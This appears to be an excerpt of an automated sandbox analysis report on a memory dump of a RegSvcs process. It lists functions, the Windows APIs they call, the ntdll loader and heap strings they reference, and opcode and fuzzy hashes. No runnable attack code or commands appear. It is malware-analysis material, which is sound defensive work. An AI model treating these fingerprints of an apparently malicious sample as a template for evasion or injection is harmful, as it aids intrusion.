PostThreadMessageW.USER32(6-G0991eL2,00000111,00000000,00000000), ref: 004145DD

Strings

6-G0991eL2, xrefs: 004145D0, 004145DC, 004145ED
6-G0991eL2, xrefs: 004145E4, 004145E7

Memory Dump Source

Source File: 00000008.00000002.1895730632.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 6-G0991eL2$6-G0991eL2
API String ID: 1836367815-3551662889
Opcode ID: fe9913b2f3a1400fa21d5b8cdb415d76d8e28109c2b373642d54a9a7add03d2d
Instruction ID: 38549f293411649258c0830f1b13313f2d29d46c7df47670e69c8b644087fa85
Opcode Fuzzy Hash: fe9913b2f3a1400fa21d5b8cdb415d76d8e28109c2b373642d54a9a7add03d2d
Instruction Fuzzy Hash: 5001C871E40218B7DB2196919C02FDF7B7C9F41B54F048059FA047B181E6B85A0687E9

Function 0042CE33 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042CE6F

Strings

1jA, xrefs: 0042CE36

Memory Dump Source

Source File: 00000008.00000002.1895730632.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: 1jA
API String ID: 3298025750-1143055518
Opcode ID: 1a448b9298212b68dc29894f52df21a4cd2100653fccb5a723d49d0bf6431244
Instruction ID: d70b1041443db1e2e805ccb61b709b115d05371b42c9336b6666583aeb00a614
Opcode Fuzzy Hash: 1a448b9298212b68dc29894f52df21a4cd2100653fccb5a723d49d0bf6431244
Instruction Fuzzy Hash: 1CE06D71200208BBD710EE59EC41FDB77ACEFC9714F00441AFA08A7282D670B9108AB8

Function 0042CDE3 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,0041EA3B,?,?,00000000,?,0041EA3B,?,?,?), ref: 0042CE22

Memory Dump Source

Source File: 00000008.00000002.1895730632.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: b9d43f51537022a0287f4499684c9dfd411c440df1a547a51fa3a8f188f675c2
Instruction ID: 22fde69fc828c61dc6a2c0bd8f983db88104e57658f5ed8b4af164efdb249f6a
Opcode Fuzzy Hash: b9d43f51537022a0287f4499684c9dfd411c440df1a547a51fa3a8f188f675c2
Instruction Fuzzy Hash: 44E06DB12002047BD610EF5AEC45F9B37ADEFC5710F00441AF908A7281DA70B9108BB9

Function 0042CE83 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,00000000,00000000,?,1BA837A4,?,?,1BA837A4), ref: 0042CEBA

Memory Dump Source

Source File: 00000008.00000002.1895730632.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 09c2f85aa2a2161a73b928ad78e41f982b88f257308dd93b4f2230fffea48a41
Instruction ID: b3595a866d3817e839e8f89a8ee7197991f009d89b4d742007d410eb33753b5c
Opcode Fuzzy Hash: 09c2f85aa2a2161a73b928ad78e41f982b88f257308dd93b4f2230fffea48a41
Instruction Fuzzy Hash: C7E08C762006147BD620EE6AEC01FDBB7ADDFC5718F00441AFE08A7242CA75BA1187F8

Function 017F2C0A Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 017F2C24

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bf9341db8686d92d3190550deda9752700a505a7d4c9843f1b856b5a91ab81f4
Instruction ID: 6fc36a2bfa57b6d0c87fb2fe631eb7fce62fe651ea548c9865e3a5ef89b8066a
Opcode Fuzzy Hash: bf9341db8686d92d3190550deda9752700a505a7d4c9843f1b856b5a91ab81f4
Instruction Fuzzy Hash: EEB09B71D019C5C9DB52E7644A087177900B7D1711F15C065D3034695F8738C1D5E276

Non-executed Functions

Function 01832349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON

Download Yara Rule

Strings

UseImpersonatedDeviceMap, xrefs: 0183251C
CFGOptions, xrefs: 01832967
@, xrefs: 01832B74
@, xrefs: 01832942
GlobalFlag, xrefs: 01832F3F, 01833059
GlobalFlag2, xrefs: 01832FC0
TracingFlags, xrefs: 01832549
FrontEndHeapDebugOptions, xrefs: 01832489
minkernel\ntdll\ldrinit.c, xrefs: 01833187
Initializing the application verifier package failed with status 0x%08lx, xrefs: 01833176
DisableHeapLookaside, xrefs: 0183246D
LdrpInitializeExecutionOptions, xrefs: 0183317D
MaxLoaderThreads, xrefs: 018324EC
MinimumStackCommitInBytes, xrefs: 01832BB0
UnloadEventTraceDepth, xrefs: 018324C0
MaxDeadActivationContexts, xrefs: 01832D82
DisableExceptionChainValidation, xrefs: 0183275F
ExecuteOptions, xrefs: 018325A0
ShutdownFlags, xrefs: 018324A1
RaiseExceptionOnPossibleDeadlock, xrefs: 01832579

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID:
String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
API String ID: 0-2160512332
Opcode ID: 856eb4aa99df75591f5e15bf69d5e27259be8f73dab50c74448197c8972bacb5
Instruction ID: e34122ac3b5895dd367c7c24a017ee58c5e6ace0f1e003dd9cd42c61a1d244db
Opcode Fuzzy Hash: 856eb4aa99df75591f5e15bf69d5e27259be8f73dab50c74448197c8972bacb5
Instruction Fuzzy Hash: A192B071608346AFE721CF28C884B6BB7E9BBC4754F08492DFA94D7251D770EA44CB92

Function 017E8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON

Download Yara Rule

Strings

Invalid debug info address of this critical section, xrefs: 018254B6
Address of the debug info found in the active list., xrefs: 018254AE, 018254FA
Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0182540A, 01825496, 01825519
corrupted critical section, xrefs: 018254C2
Critical section address., xrefs: 01825502
Critical section debug info address, xrefs: 0182541F, 0182552E
Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018254CE
First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018254E2
8, xrefs: 018252E3
Thread identifier, xrefs: 0182553A
double initialized or corrupted critical section, xrefs: 01825508
Critical section address, xrefs: 01825425, 018254BC, 01825534
Thread is in a state in which it cannot own a critical section, xrefs: 01825543
undeleted critical section in freed memory, xrefs: 0182542B

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID:
String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
API String ID: 0-2368682639
Opcode ID: eeac51f3634841d92e857bdd7030aabcc00733c0f59075e26f81aa93c17ec20f
Instruction ID: 114d79cf93d1934682e3b98a05fa72c5135b667bd9095e9f21a6c059902a6507
Opcode Fuzzy Hash: eeac51f3634841d92e857bdd7030aabcc00733c0f59075e26f81aa93c17ec20f
Instruction Fuzzy Hash: 62818AB0A40358AFDF21CF99C849BAEFBB5BB49704F244119F504FB251D371AA84CB91

Function 017E29F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON

Download Yara Rule

Strings

SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01822624
SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01822498
@, xrefs: 0182259B
SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01822409
SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 018225EB
SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01822602
SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 018222E4
SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01822506
RtlpResolveAssemblyStorageMapEntry, xrefs: 0182261F
SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 018224C0
SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01822412

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID:
String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
API String ID: 0-4009184096
Opcode ID: ec43a90528c2a37c15444f0e7964014fd00f22e4df46fc7628f3d2cc473677c2
Instruction ID: e6b8338504630e8733f67a6cb294f5d4fccfb4d3a282f6b7cf2be2ab7e6b7894
Opcode Fuzzy Hash: ec43a90528c2a37c15444f0e7964014fd00f22e4df46fc7628f3d2cc473677c2
Instruction Fuzzy Hash: FF024EB1D002299BDB31DB58CC84B9AF7F8AB58704F4041DAE609A7252E7709FD4CF99

Function 01858B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON

Download Yara Rule

Strings

http://schemas.microsoft.com/SMI/2020/WindowsSettings, xrefs: 01858BD0
SegmentHeap, xrefs: 01858BE9
runtimebroker.exe, xrefs: 01858B73
DefaultBrowser_NOPUBLISHERID, xrefs: 01858D00
smss.exe, xrefs: 01858B8B
svchost.exe, xrefs: 01858B68
services.exe, xrefs: 01858B96
lsass.exe, xrefs: 01858BA1
heapType, xrefs: 01858BCB
csrss.exe, xrefs: 01858B80

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID:
String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
API String ID: 0-2515994595
Opcode ID: 60b9c4a08e45740048eb8f1a8941229f5f4d49ad48ab9268e69b9755d499ced8
Instruction ID: 0699fbd3a844841440ec412b92c15882c6a2d4e02a5ed37233430da8a6f9c982
Opcode Fuzzy Hash: 60b9c4a08e45740048eb8f1a8941229f5f4d49ad48ab9268e69b9755d499ced8
Instruction Fuzzy Hash: 1051D2711183059BD369DF1A8844BABBBE8FF95340F14492EEE96C3241E770DB04CB92

Function 01860274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 01860399, 018604A8, 018605D0, 01860675, 018606CC
HEAP: , xrefs: 018603A6, 018604B5, 018605DD, 01860682, 018606D9
RtlReAllocateHeap, xrefs: 018602BF, 01860362
About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 018604D3
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 018606EA
About to reallocate block at %p to %Ix bytes, xrefs: 018603BA
Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 0186069F
Just reallocated block at %p to %Ix bytes, xrefs: 018605F1

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID:
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 0-1700792311
Opcode ID: e7c5aab7eac11e4074385444dd8c501cb0a6fa526710c5269bc02135b328f263
Instruction ID: f86c4e42156301ea1a3319b01679ff94b827c4c5cddca179190a3211566d7ead
Opcode Fuzzy Hash: e7c5aab7eac11e4074385444dd8c501cb0a6fa526710c5269bc02135b328f263
Instruction Fuzzy Hash: 0AD1EB3160468ADFDB22DF68C444AAAFBF6FF89704F488159F545DB252C7749A80CF18

Function 018389B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON

Download Yara Rule

Strings

HandleTraces, xrefs: 01838C8F
AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01838A3D
AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01838A67
VerifierDlls, xrefs: 01838CBD
VerifierFlags, xrefs: 01838C50
AVRF: -*- final list of providers -*- , xrefs: 01838B8F
VerifierDebug, xrefs: 01838CA5

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID:
String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
API String ID: 0-3223716464
Opcode ID: b19c87720f2f51edb22adb95952283e9ee4f5fb58245e0674acc9d6ed999b99e
Instruction ID: b3f0874c36fa6a9b2018c1c7a902018e283edc863e22797fef583900bfe5b383
Opcode Fuzzy Hash: b19c87720f2f51edb22adb95952283e9ee4f5fb58245e0674acc9d6ed999b99e
Instruction Fuzzy Hash: BA9156B1A45306AFE721DF28C884B5AB7E4ABC5714F880618FA41EB241C370AF45CBD2

Function 017E63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON

Download Yara Rule

Strings

Process initialization failed with status 0x%08lx, xrefs: 0182413A
LDR:MRDATA: Process initialization failed with status 0x%08lx, xrefs: 018240D8
Delaying execution failed with status 0x%08lx, xrefs: 01824258
NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop, xrefs: 018241FE
minkernel\ntdll\ldrinit.c, xrefs: 018240E9, 0182414B, 0182420F, 01824269
_LdrpInitialize, xrefs: 018240DF, 01824141, 01824205, 0182425F

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID:
String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
API String ID: 0-792281065
Opcode ID: a40706c9c6186e3313b5cafc3e9fdbfe4428112c11cb4667da2a2eef73835c1c
Instruction ID: 686f0f31d794b2ae55a8ef1f0ea89b559fd59b72c5acc9d053cc303fd7c66b41
Opcode Fuzzy Hash: a40706c9c6186e3313b5cafc3e9fdbfe4428112c11cb4667da2a2eef73835c1c
Instruction Fuzzy Hash: C9915E70B003259BEB36DF58D848B6ABBE1FF55B14F54012CEA00AB285D7709B81CBE1

Function 017A645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON

Download Yara Rule

Strings

Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01809A2A
Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 018099ED
apphelp.dll, xrefs: 017A6496
Getting the shim engine exports failed with status 0x%08lx, xrefs: 01809A01
minkernel\ntdll\ldrinit.c, xrefs: 01809A11, 01809A3A
LdrpInitShimEngine, xrefs: 018099F4, 01809A07, 01809A30

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID:
String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-204845295
Opcode ID: 5613010bf255539b7896a4ff460eccd684b67b5d0fa996a5cab637302b38369d
Instruction ID: 92cfe704de39a50f83bfe39a55ac811c76df79cb38af3bd8f9ca49bc08e7fd34
Opcode Fuzzy Hash: 5613010bf255539b7896a4ff460eccd684b67b5d0fa996a5cab637302b38369d
Instruction Fuzzy Hash: 3B51F3716083049FE721EF24DC55BABBBE4FB84748F44091DFA89971A5E630EA44CB92

Function 017E2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

RtlGetAssemblyStorageRoot, xrefs: 01822160, 0182219A, 018221BA
SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0182219F
SXS: %s() passed the empty activation context, xrefs: 01822165
SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01822178
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 018221BF
SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01822180

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID:
String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
API String ID: 0-861424205
Opcode ID: 9d68002c60c60f4a32e11233150c9caf8a12172a15140dfe5f72bdba66d8a512
Instruction ID: dbbfe71c94592733bda4440f1cfd0f3898bf10f39f7e4fcdb53fe9b723ed7ac0
Opcode Fuzzy Hash: 9d68002c60c60f4a32e11233150c9caf8a12172a15140dfe5f72bdba66d8a512
Instruction Fuzzy Hash: 693137B6F80225B7FB229A999C45F5BBBEDDB98B50F050059FB04EB101D270AB41C6E1

Function 017EC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

LdrpInitializeImportRedirection, xrefs: 01828177, 018281EB
minkernel\ntdll\ldrredirect.c, xrefs: 01828181, 018281F5
Unable to build import redirection Table, Status = 0x%x, xrefs: 018281E5
minkernel\ntdll\ldrinit.c, xrefs: 017EC6C3
Loading import redirection DLL: '%wZ', xrefs: 01828170
LdrpInitializeProcess, xrefs: 017EC6C4

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID:
String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
API String ID: 0-475462383
Opcode ID: 8ffd6e498e061f512bdd0757ddf97b53f8f866391ade180942aec24ed9db9ff1
Instruction ID: 5702b989ba81fb50c3e65d84eedd434600ce9e0ce0be608a03e91395984c575d
Opcode Fuzzy Hash: 8ffd6e498e061f512bdd0757ddf97b53f8f866391ade180942aec24ed9db9ff1
Instruction Fuzzy Hash: FF3127716447469FD221EF28D84AE2BFBE4EF94B10F040518F9419B285D620EE04CBA2

Function 017F096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON

Download Yara Rule

APIs

Part of subcall function 017F2DF0: LdrInitializeThunk.NTDLL ref: 017F2DFA

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017F0BA3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017F0BB6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017F0D60
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017F0D74

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
String ID:
API String ID: 1404860816-0
Opcode ID: b324ca6e09e9529b4d4a59a2e0c209dc2176fa118e3375df9a1455e82024fb1c
Instruction ID: 4ba2cb86a87492dac789043111baec6803690c6a2a862acbac551394c2cbffb6
Opcode Fuzzy Hash: b324ca6e09e9529b4d4a59a2e0c209dc2176fa118e3375df9a1455e82024fb1c
Instruction Fuzzy Hash: E44239719007159FDB21CF28C884BAAB7F5BF08314F1445ADEA99DB346E770AA84CF61

Function 017BA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON

Download Yara Rule

Strings

6, xrefs: 017BA3F7
LdrResFallbackLangList Exit, xrefs: 017BA3FF
8, xrefs: 017BA3E7
LdrResFallbackLangList Enter, xrefs: 017BA3EF

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID:
String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
API String ID: 0-379654539
Opcode ID: dfb74d49bc5b7f976c74d02a2298cc3630404a9008ccd2ea42c4b1e750585cb5
Instruction ID: 4060d35ee2d830aa454f263b9e99a42bf8ca1d3cdbd483e901afc32d1d1daa2d
Opcode Fuzzy Hash: dfb74d49bc5b7f976c74d02a2298cc3630404a9008ccd2ea42c4b1e750585cb5
Instruction Fuzzy Hash: 15C19B75108386CFD711EF58C084BAAF7E4BF84704F14896AF995CB255E738CA49CB52

Function 017E8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON

Download Yara Rule

Strings

\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 017E855E
@, xrefs: 017E8591
minkernel\ntdll\ldrinit.c, xrefs: 017E8421
LdrpInitializeProcess, xrefs: 017E8422

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID:
String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
API String ID: 0-1918872054
Opcode ID: d4c034640962a916001b57cb049ba3e3beacb06d8d240dd9050659ac9bf3b09d
Instruction ID: cd5debdde325fca6ee08ff659a0af756ad33380637ae40453a9a9d74ce5b1ca9
Opcode Fuzzy Hash: d4c034640962a916001b57cb049ba3e3beacb06d8d240dd9050659ac9bf3b09d
Instruction Fuzzy Hash: 47919971548345AFD722EF65CC48FABFAE8EB88744F40092EFA84D6155E730DA448B63

Function 017E273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON

Download Yara Rule

Strings

RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 018221D9, 018222B1
.Local, xrefs: 017E28D8
SXS: %s() passed the empty activation context, xrefs: 018221DE
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 018222B6

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID:
String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
API String ID: 0-1239276146
Opcode ID: 35ee36948c22071f40c483ffa76c72c7964176dcb64635f87dec8558bbd52b26
Instruction ID: 3031130ad5600bb5dc4aad466a87cae4b8481641445c32524650b3d615d9328f
Opcode Fuzzy Hash: 35ee36948c22071f40c483ffa76c72c7964176dcb64635f87dec8558bbd52b26
Instruction Fuzzy Hash: 4FA19D319402299BDB25CF68D888BA9F7F5BF59354F2541EAD908EB252D7309EC0CF90

Function 017E4AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON

Download Yara Rule

Strings

SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01823437
SXS: %s() called with invalid flags 0x%08lx, xrefs: 0182342A
SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01823456
RtlDeactivateActivationContext, xrefs: 01823425, 01823432, 01823451

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID:
String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
API String ID: 0-1245972979
Opcode ID: 017fe6f47ddc2579a71d3d312103a2faca492d85a51de113a8ac365994de5f5e
Instruction ID: 90ab1d33449813ba1ca9610fde98694030f458f8765d7bd0923f9e8a742da744
Opcode Fuzzy Hash: 017fe6f47ddc2579a71d3d312103a2faca492d85a51de113a8ac365994de5f5e
Instruction Fuzzy Hash: 546134726007229BDB23CF1CC895B2AF7E1BF98B10F14855DE956DB250C734EA81CB91

Function 017B64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON

Download Yara Rule

Strings

ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01810FE5
ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01811028
ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 018110AE
ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0181106B

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID:
